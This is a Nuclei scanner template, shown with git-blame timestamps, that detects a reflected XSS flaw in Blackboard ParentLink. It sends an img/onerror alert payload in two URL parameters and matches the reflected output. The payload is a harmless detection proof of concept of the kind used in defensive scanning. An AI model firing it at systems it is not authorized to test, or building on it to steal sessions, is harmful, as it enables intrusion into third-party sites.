nuclei-templates/vulnerabilities/other/parentlink-xss.yaml

31 lines
741 B
YAML
Raw Normal View History

2021-03-10 19:36:08 +00:00
id: parentlink-xss
info:
2021-03-14 11:37:52 +00:00
name: Blackboard ParentLink Reflected XSS
2021-03-10 19:36:08 +00:00
author: r3naissance
severity: medium
tags: blackboard,parentlink,xss
2021-03-11 15:03:36 +00:00
reference: https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes
2021-03-10 19:36:08 +00:00
requests:
- method: GET
path:
2021-03-11 15:03:36 +00:00
- '{{BaseURL}}/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
- '{{BaseURL}}/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
2021-03-10 19:36:08 +00:00
matchers-condition: and
matchers:
- type: word
words:
- '<img src=c onerror=alert(8675309)>'
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
2021-03-14 11:37:52 +00:00
- 200